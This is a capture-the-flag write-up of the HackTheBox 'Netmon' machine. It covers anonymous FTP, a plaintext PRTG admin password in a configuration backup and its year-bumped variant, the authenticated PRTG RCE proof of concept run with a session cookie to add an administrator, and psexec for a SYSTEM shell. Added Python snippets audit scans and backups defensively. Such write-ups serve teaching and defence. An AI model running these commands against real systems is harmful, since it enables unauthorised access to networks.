HackTheBox Netmon write-up

(Difficulty: Easy)

Reconnaissance


PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19  12:18AM                 1024 .rnd
| 02-25-19  10:15PM       <DIR>          inetpub
| 07-16-16  09:18AM       <DIR>          PerfLogs
| 02-25-19  10:56PM       <DIR>          Program Files
| 02-03-19  12:28AM       <DIR>          Program Files (x86)
| 02-03-19  08:08AM       <DIR>          Users
|_02-25-19  11:49PM       <DIR>          Windows
| ftp-syst:
|_  SYST: Windows_NT
80/tcp    open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-favicon: Unknown favicon MD5: 36B3EF286FA4BEFBB797A0966B456479
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Uptime guess: 0.769 days (since Fri Jun 28 17:26:42 2019)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -7m14s, deviation: 0s, median: -7m14s
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-06-29 11:46:32
|_  start_date: 2019-06-28 17:19:45
Scan command: nmap -A -v -sS -f -T4 -p- -oN nmap.txt 10.10.10.152

From the initial scan I can see that the root of the main drive is being served over FTP to anonymous users, so I decide to look around for files containing credentials or hashes.
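To turn a scan like this into something a defender can act on, here is an added example (mine, not from the original post) that parses a constructed excerpt of the nmap output above and flags the three exposures this box rests on: anonymous FTP serving the drive root, a PRTG build no newer than the version named in the exploit title, and SMB signing that is not required. Treating builds up to and including 18.2.38 as affected is my assumption.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample, shortened from the nmap -oN output shown above.
SAMPLE_SCAN = """\
21/tcp    open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_02-25-19  11:49PM       <DIR>          Windows
80/tcp    open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
| smb2-security-mode:
|_    Message signing enabled but not required
"""

# Assumption: builds up to and including 18.2.38 (the version in the
# searchsploit title quoted later in the write-up) are treated as affected.
PRTG_LAST_AFFECTED = (18, 2, 38)


def parse_version(text: str) -> Optional[Tuple[int, int, int]]:
    """Pull the PRTG build out of the http-server-header line, if present."""
    m = re.search(r"PRTG/(\d+)\.(\d+)\.(\d+)", text)
    return tuple(int(x) for x in m.groups()) if m else None


def audit_scan(scan: str) -> List[str]:
    """Return human-readable findings for the exposures this box relies on."""
    findings = []
    if "Anonymous FTP login allowed" in scan:
        # A top-level 'Windows' directory in the listing means the drive root is shared.
        if re.search(r"<DIR>\s+Windows\s*$", scan, re.M):
            findings.append("FTP: anonymous login with drive root exposed")
        else:
            findings.append("FTP: anonymous login allowed")
    ver = parse_version(scan)
    if ver and ver <= PRTG_LAST_AFFECTED:
        ver_s = ".".join(map(str, ver))
        findings.append(f"PRTG {ver_s}: at or below 18.2.38, patch before further review")
    if "Message signing enabled but not required" in scan:
        findings.append("SMB: message signing not required (relay risk)")
    return findings


if __name__ == "__main__":
    for line in audit_scan(SAMPLE_SCAN):
        print(line)
```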

ftp -p 10.10.10.152 with the user 'Anonymous' and any password. I attempted to upload a web shell backdoor, but the FTP service only permits read-only access, and I am unable to enter privileged locations such as the Administrator's home directory, which also implies I lack the privileges to reach the SAM hive and crack its hashes.

I remember there was an application named PRTG Network Monitor running on port 80, so I decide to look for its install location and check its configuration files for potential credentials.

After some navigation using cd and ls I was able to find PRTG Network Monitor's location: cd "Program Files (x86)"

Unable to find anything useful, I resort to researching this application. A quick Google search reveals a post on Reddit which discusses plain-text passwords being exposed in a specific version of PRTG Network Monitor.

I navigate to the directory that may be affected by this disclosure: cd "ProgramData\Paessler\PRTG Network Monitor"

There I find two files that may hold credentials: PRTG Configuration.old and PRTG Configuration.old.bak. I download the second one because its timestamp is from 2018, the same year as the Reddit post, which makes it more likely to correspond to the vulnerable version: get "PRTG Configuration.old.bak". I exit the FTP interactive client once the transfer completes.

After some brief research on PRTG Network Monitor I learned that the default admin username is prtgadmin, so I used that to narrow down my search in the downloaded file by printing the 4 lines before and after each match of the username: egrep -i -A 4 -B 4 prtgadmin 'PRTG Configuration.old.bak'

<!-- User: prtgadmin -->
PrTg@dmin2018

Those credentials fail but I decide to be a little creative and change the year in the password to 2019 as the admin user may have been lazy with the password convention.

PrTg@dmin2019

I am able to log in, though the application is very slow and unstable.
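The two weaknesses in this section, a plaintext credential in a configuration backup and a password that changes only by its year, are both things a defender can check for. The following added example (mine, not from the post and not Paessler's code) scans a constructed fragment shaped like the egrep hit above and flags both; the only file layout it assumes is the `<!-- User: name -->` comment followed by the password line, as seen in that output.

```python
import re
from typing import List, Optional, Tuple

# Constructed fragment shaped like the egrep match shown above; the
# surrounding XML is assumed and the real backup layout is not reproduced.
SAMPLE_BACKUP = """\
<data>
  <!-- User: prtgadmin -->
  PrTg@dmin2018
  <!-- User: svc_probe -->
  Winter-Sunset-42-Tango
</data>
"""

USER_COMMENT = re.compile(r"<!--\s*User:\s*(\S+)\s*-->")
YEAR_SUFFIX = re.compile(r"^(.*?)((?:19|20)\d{2})$")


def extract_credentials(text: str) -> List[Tuple[str, str]]:
    """Pair each 'User:' comment with the next non-empty, non-tag line."""
    lines = [ln.strip() for ln in text.splitlines()]
    creds = []
    for i, ln in enumerate(lines):
        m = USER_COMMENT.search(ln)
        if m:
            nxt = next((x for x in lines[i + 1:] if x), "")
            if nxt and not nxt.startswith("<"):
                creds.append((m.group(1), nxt))
    return creds


def year_suffix(password: str) -> Optional[int]:
    """Return the trailing four-digit year if the password ends in one."""
    m = YEAR_SUFFIX.match(password)
    return int(m.group(2)) if m else None


def is_year_rotation(old: str, new: str) -> bool:
    """True when 'new' is 'old' with only the trailing year changed (a
    check a password-change handler can use to reject such rotations)."""
    a, b = YEAR_SUFFIX.match(old), YEAR_SUFFIX.match(new)
    return bool(a and b and a.group(1) == b.group(1) and a.group(2) != b.group(2))


def audit_backup(text: str) -> List[str]:
    """Report plaintext credentials and year-suffixed passwords in a backup."""
    findings = []
    for user, pw in extract_credentials(text):
        findings.append(f"{user}: credential stored in plaintext")
        if year_suffix(pw) is not None:
            findings.append(f"{user}: password ends in a year, rotation is guessable")
    return findings
```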

At first glance there does not appear to be any conventional way to execute code from the administrative tools or other functions. At the bottom left I notice the version 18.1.37.13946, so I look for authenticated exploits: searchsploit PRTG Network Monitor 18

PRTG Network Monitor 18.2.38 - (Authenticated) Remote Code Execution

Well that's convenient!

Elevated foothold


The next step is to download the PoC for this vulnerability, searchsploit -m 46527.sh, and convert the script's line endings from Windows to Linux/Unix with dos2unix 46527.sh. The script requires the cookie from the authenticated session, and the easy way to get that in most browsers is the F12 developer console. In Firefox's developer console, go to Storage, Cookies, then copy the name and value of the cookie and supply it as an argument to the script. The script adds a new user named pentest with the password P3nT3st! and then adds that user to the local Administrators group by exploiting the notification vulnerability in PRTG Network Monitor. So I execute the script:

./46527.sh -u http://10.10.10.152 -c "OCTOPUS1813713946=e0EzQjkxMjAwLUNGQkEtNDdCNS05N0VDLTFDNTM4QzIyMTM1N30%3D"

And the user is added. The next step is to obtain a shell. I will use Impacket's psexec.py to authenticate with the newly created administrator credentials and obtain a session as SYSTEM. If you don't have Impacket, you can download and install it with sudo pip install impacket. I quote the password in the command so that bash does not treat the ! symbol as a history expansion.

psexec.py pentest:"P3nT3st!"@10.10.10.152

And finally, to grab the flags: type C:\Users\Public\Desktop\user.txt C:\Users\Administrator\Desktop\root.txt

This box is a good reminder to create more unpredictable passwords and to keep applications updated, especially if they are running with elevated privileges.

Special thanks to mrb3n for this machine!

Thanks for reading :)
